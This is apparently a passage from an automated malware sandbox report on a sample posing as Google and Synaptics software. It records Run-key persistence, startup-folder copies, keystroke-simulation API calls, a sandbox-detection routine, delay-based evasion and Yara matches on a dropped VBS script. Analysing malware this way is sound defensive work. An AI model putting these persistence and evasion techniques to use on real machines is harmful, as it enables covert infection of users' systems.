                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UAINOJJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UAINOJJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004CF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,4_2_004CF78E
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_00517F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,4_2_00517F0E
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C5F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,13_2_00C5F78E
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00CA7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,13_2_00CA7F0E
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00ADF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,32_2_00ADF78E
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B27F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,32_2_00B27F0E
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004D1E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_004D1E5A
                            Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                            Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Found API chain indicative of sandbox detection
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeWindow / User API: threadDelayed 4800Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeWindow / User API: foregroundWindowGot 1379Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeAPI coverage: 6.4 %
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeAPI coverage: 3.7 %
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeAPI coverage: 3.7 %
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe TID: 7964Thread sleep time: -48000s >= -30000sJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 3712Thread sleep time: -900000s >= -30000sJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 6288Thread sleep time: -4560000s >= -30000s
                            Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 2220Thread sleep time: -60000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\ProgramData\Synaptics\Synaptics.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeThread sleep count: Count: 4800 delay: -10Jump to behavior
                            Source: Yara matchFile source: 00000004.00000002.2732607207.0000000004372000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.2718201933.0000000002A70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.2719329795.0000000002BA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.2719329795.0000000002B88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: ._cache_Google.exe PID: 7960, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 8176, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, type: DROPPED
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004CDD92 GetFileAttributesW,FindFirstFileW,FindClose,4_2_004CDD92
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_00502044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_00502044
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_0050219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_0050219F
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_005024A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,4_2_005024A9
